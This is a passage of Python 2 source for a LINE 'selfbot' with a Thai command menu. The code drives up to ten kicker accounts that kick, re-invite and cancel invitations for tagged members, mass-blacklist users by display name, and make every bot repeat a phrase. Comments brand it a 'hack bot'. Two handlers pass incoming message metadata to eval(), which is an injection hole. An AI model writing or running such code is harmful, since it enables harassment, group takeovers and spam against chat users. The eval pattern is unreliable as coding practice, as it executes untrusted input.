ล๊อกแอทมินกลุ่ม
Set:ownerlock:on
ล๊อกรูปกลุ่ม
Set:iconlock:on
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeowner
เปลี่ยนเจ้าของห้องสั่งแล้วส่งคอลแทคคนที่จะเป็นเจ้าของห้องคนต่อไปลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addblacklist
บัญชีดำแบ็คลิสคนไม่ให้เข้ากลุ่มสั่งแล้วส่งคอลแทคคนที่เราจะแบ็คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addwhitelist
บัญชีขาวแก้ดำสั่งแล้วส่งคอลแทคคนที่เราจะแก้แบ๊คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:off ปลดล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:on ล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:inviteurl เปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:DenyURLInvite ปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:cancelinvite ยกเลิกค้างเชิญสั่ง2ครั้ง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:groupcreator เช็คเจ้าของบ้านตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:extracreator เช็คเจ้าของบ้านคนสำรอง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeextraowner
เพิ่มเจ้าของบ้านคนที2หรือเรียกคนสำรองสั่งแล้วส่งคอลแทคคนที่จะเป็นคนสำรองลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:turncreator
สลับให้เจ้าของบ้านคนที่2เป็นตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
ดูคนอ่าน
สั่งตั้งค่าก่อนแล้วค่อยสั่งอ่านคน
Setlastpoint ตั้งค่า
Viewlastseen สั่งอ่าน
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
สนใจติดต่อที่
By: ☬ARIFISTIFIK☬
LINE ID 4545272
http://line.me/ti/p/arif.mh
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
""")
#==================================================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["เชิญ"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["invite on"]:
if msg.from_ in admin:
wait["winvite"] = False
cl.sendText(msg.to,"ปิดการเชิญ แล้ว.")
elif msg.text in ["Bot1 invite contact","1เชิญ"]:
if msg.from_ in admin:
wait["ainvite"] = True
ki1.sendText(msg.to,"send contact")
elif msg.text in ["Bot2 invite contact","2เชิญ"]:
if msg.from_ in admin:
wait["binvite"] = True
ki2.sendText(msg.to,"send contact")
elif ("Ktc " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif '123zzz' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text in ["ยกเลิก"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["บอทยกเลิก"]:
if msg.toType == 2:
klist=[ki1,ki2,ki3,ki4,ki5,ki6,ki7]
kicker = random.choice(klist)
G = kicker.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"No one is inviting")
else:
kicker.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"Can not be used outside the group")
else:
kicker.sendText(msg.to,"Not for use less than group")
elif msg.text in ["#Link on"]:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif msg.text in ["เปิดลิ้ง"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"อนุญาติ ให้มีการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["ปิดลิ้ง"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'ginfo':
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif msg.text in ["!Glist","Myginfo"]:
gs = cl.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["Selfbot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"[SELFBOT\nBy:☬ARIFISTIFIK☬]")
elif "ไอดี" == msg.text:
key = msg.to
cl.sendText(msg.to, key)
elif ("Hack " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
# elif "Phet Keyy" in msg.text:
# cl.sendText(msg.to,""" [{PHET HACK BOT}] \n\n key Only Kicker #\n\n[Kb1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Pb1 Gift]\n[Pb1 bye]\n\n
#❦❧〖฿❂Ŧ〗☞ᵀËÄM ທஇລ❂ق B❂T✓
#❦❧ ᵀËÄM ℓℓπ้ी૪ B❂T ✓
#❦❧ ᵀËÄM ທஇລ❂قB❂T ✓
#☠Ҝŋ β☢ȶȶ ƿℓαÿєᴿ☠
#✍ Ŧ€₳M ж Ħ₳ʗҜ฿❂Ŧ ✈
#Ŧ€₳M ✍ ທஇລ❂قীள้௭ิњ ✈
#☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢
#・⋆ ざঝণのঝ ⋆ ・
#♤ のю४ণধபӘທ ♤
#🇹?? ฿ΘŧŧĽÎη℮Ŧђάίłάήđ 🇹🇭
#[By.🐯 हईທຮຮๅજईह 🐯]
#[By.β•`BF.บั้ม•`]
#[By.Gυ Tєʌм HʌcκBoт]
#[By.❦〖Ᵽɧëȶ〗☞ᵀËÄM ທஇລ❂ق B❂T✓]
#""")
elif msg.text.lower() == 'ยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif msg.text.lower() == 'บอทยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki1.cancelGroupInvitation(msg.to,[_mid])
ki1.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif "คท @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("คท @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "#cb" in msg.text:
nk0 = msg.text.replace("#cb","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"😏")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"😏")
except:
cl.sendText(msg.to,"😏")
elif "แบนหมด" in msg.text:
nk0 = msg.text.replace("แบนหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน ทั้งหมด" in msg.text:
nk0 = msg.text.replace("ลบแบน ทั้งหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text == "กลุ่ม":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "ไม่พบผู้สร้างกลุ่ม"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "[ปิด]"
else:
u = "[เปิด]"
cl.sendText(msg.to,"[ชื่อของกลุ่ม]:\n" + str(ginfo.name) + "\n[Gid]:\n" + msg.to + "\n[ผู้สร้างกลุ่ม:]\n" + gCreator + "\n[ลิ้งค์รูปกลุ่ม]:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n[จำนวนสมาชิก]:" + str(len(ginfo.members)) + "คน\n[จำนวนค้างเชิญ]:" + sinvitee + "คน\n[สถานะลิ้งค์]:" + u + "URL\n[By: ☬ARIFISTIFIK☬]")
else:
cl.sendText(msg.to,"Nama Gourp:\n" + str(ginfo.name) + "\nGid:\n" + msg.to + "\nCreator:\n" + gCreator + "\nProfile:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Bot1@@" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*200 : (j+1)*200]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
ki1.sendMessage(msg)
elif msg.text in ["Bot?","เทส"]:
ki1.sendText(msg.to,"😈คิกเกอร๋.1 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki2.sendText(msg.to,"😈คิกเกอร์.2 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki3.sendText(msg.to,"😈คิกเกอร์.3 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki4.sendText(msg.to,"😈คิกเกอร์.4 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki5.sendText(msg.to,"😈คิกเกอร์.5 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki6.sendText(msg.to,"😈คิกเกอร์.6 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki7.sendText(msg.to,"😈คิกเกอร์.7 รายงานต้ว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki8.sendText(msg.to,"😈คิกเกอร์.8 รายงานตีว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki9.sendText(msg.to,"😈คิกเกอร์.9 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
ki10.sendText(msg.to,"😈คิกเกอร์.10 รายงานตัว😈\n[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\n[ลิ้ง] http://line.me/ti/p/arif.mh ")
elif "/พูด " in msg.text:
bctxt = msg.text.replace("/พูด ","")
ki1.sendText(msg.to,(bctxt))
ki2.sendText(msg.to,(bctxt))
ki3.sendText(msg.to,(bctxt))
ki4.sendText(msg.to,(bctxt))
ki5.sendText(msg.to,(bctxt))
ki6.sendText(msg.to,(bctxt))
ki7.sendText(msg.to,(bctxt))
ki8.sendText(msg.to,(bctxt))
ki9.sendText(msg.to,(bctxt))
ki10.sendText(msg.to,(bctxt))
elif "All mid" == msg.text:
ki1.sendText(msg.to,Amid1)
ki2.sendText(msg.to,Amid2)
ki3.sendText(msg.to,Amid3)
ki4.sendText(msg.to,Amid4)
ki5.sendText(msg.to,Amid5)
ki6.sendText(msg.to,Amid6)
ki7.sendText(msg.to,Amid7)
ki8.sendText(msg.to,Amid8)
ki9.sendText(msg.to,Amid9)
ki10.sendText(msg.to,Amid10)
elif msg.text in ["Protect:on","Protect on","เปิดป้องกัน"]:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:off","Qr off"]:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Qr:on","Qr on"]:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:off","Protect off","ปิดป้องกัน"]:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "เปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ล็อคชื่อ สำเร็จ.👌..")
else:
cl.sendText(msg.to,"bone..")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "ปิด ล็อคชื่อ" in msg.text:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ปิด ล็อคชื่อแล้ว.👌.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"bone..")
elif "ปิด เชิญ" == msg.text:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ปิดการเชิญเข้ากลุ่ม\nของสมาชิกแล้ว.👌.")
elif "เปิด เชิญ" == msg.text:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"เปิด ให้สมาชิกทุกคน\nสามรถเชิญเพื่อนได้.👌.")
except:
pass
elif "Cn: " in msg.text:
string = msg.text.replace("Cn: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Name " + string + " Done Bosqu")
elif msg.text in ["invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif "Mc " in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Mc: " in msg.text:
mmid = msg.text.replace("Mc: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["K on","เปิด คท","Contact on","K:on"]:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["contact v"]:
if msg.from_ in admin:
wait["winvite"] = True
random.choice(KAC).sendText(msg.to,"send contact")
elif msg.text in ["K:off","ปิด คท","Contact off","K off"]:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Auto join on","Join on","Join:on","เปิด เข้ากลุ่ม","Poin on"]:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif msg.text in ["Join off","Auto join off","ปิด เข้ากลุ่ม","Join:off","Poin off"]:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
elif "Gcancel:" in msg.text:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave:on","Auto leave on","เปิด ออกแชท","Leave on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["Leave:off","Auto leave off","ปิด ออกแชท","Leave off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["เปิด แชร์","Share on","Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了开。")
elif msg.text in ["ปิด แชร์","Share off","Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"要了关断。")
elif msg.text in ["Like on","เปิด ไลค์"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดอยู่แล้ว。")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"เปิดระบบออโต้ไลค์.👌")
elif msg.text in ["ปิด ไลค์","Like off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดอยู่แล้ว")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดระบบออโต้ไลค์.👌")
#========================================
#========================================
elif msg.text in ["เชคค่า","เช็คค่า","Set"]:
print "Setting pick up..."
md = "SELF BOT\nBy:☬ARIFISTIFIK☬\n\n"
if wait["likeOn"] == True: md+=" ออโต้ไลค์ : ✔ \n"
else:md+=" ออโต้ไลค์ : ❌ \n"
if wait["alwayRead"] == True: md+=" อ่าน : ✔ ??\n"
else:md+=" อ่าน : ❌ \n"
if wait["detectMention"] == True: md+=" ตอบแทค : ✔ \n"
else:md+=" ตอบแทค : ❌ \n"
if wait["kickMention"] == True: md+=" ออโต้เตะ: ✔ \n"
else:md+=" ออโต้เตะ : ❌ \n"
if wait["Notifed"] == True: md+=" Notifed : ✔ \n"
else:md+=" Notifed : ❌ \n"
if wait["Notifedbot"] == True: md+=" Notifedbot : ✔ \n"
else:md+=" Notifedbot : ❌ \n"
if wait["acommentOn"] == True: md+=" Hhx1 : ✔ \n"
else:md+=" Hhx1 : ❌ \n"
if wait["bcommentOn"] == True: md+=" Hhx2 : ✔ \n"
else:md+=" Hhx2 : ❌ \n"
if wait["ccommentOn"] == True: md+=" Hhx3 : ✔ \n"
else:md+=" Hhx3 : ❌ \n"
if wait["Protectcancl"] == True: md+=" Cancel : ✔ \n"
else:md+=" Cancel : ❌ \n"
if wait["winvite"] == True: md+=" เชิญ: ✔ \n"
else:md+=" เชิญ : ❌ \n"
if wait["pname"] == True: md+=" ล็อคชื่อ : ✔ \n"
else:md+=" ล็อคชื่อ : ❌ \n"
if wait["contact"] == True: md+=" Contact : ✔ \n"
else: md+=" Contact : ❌ \n"
if wait["autoJoin"] == True: md+=" ออโต้เข้ากลุ่ม : ✔ \n"
else: md +=" ออโต้เข้ากลุ่ม : ❌ \n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + " \n"
else: md+= " Group cancel : ❌ \n"
if wait["leaveRoom"] == True: md+=" ออโต้ ออกแชท : ✔ \n"
else: md+=" ออโต้ ออกแชท: ❌ \n"
if wait["timeline"] == True: md+=" ออโต้ แชร์ : ✔ \n"
else:md+=" ออโต้ แชร์ : ❌ \n"
if wait["clock"] == True: md+=" ชื่อ นาฬิกา : ✔ \n"
else:md+=" ชื่อ นาฬิกา : ❌ \n"
if wait["autoAdd"] == True: md+=" ออโต้ เพิ่มเพื่อน : ✔ \n"
else:md+=" ออโต้ เพิ่มเพื่อน : ❌ \n"
if wait["commentOn"] == True: md+=" ออโต้ คอมเม้น : ✔ \n"
else:md+=" ออโต้ คอมเม้น : ❌ \n"
if wait["Backup"] == True: md+=" ดึงกลับ : ✔ \n"
else:md+=" ดึงกลับ : ❌ \n"
if wait["qr"] == True: md+=" ป้องกัน QR : ✔ \n"
else:md+=" ป้องกัน QR : ❌ \n"
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
#========================================
elif msg.text in ["รีบอท","รีบูต"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "เชลบอท ได้รีสตาร์ตแล้ว.👌\nกรุณาตั้งค่าใหม่อีกครั้ง.👈")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#========================================
elif msg.text.lower() == 'รีคิก':
if msg.toType == 2:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"waitting...")
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
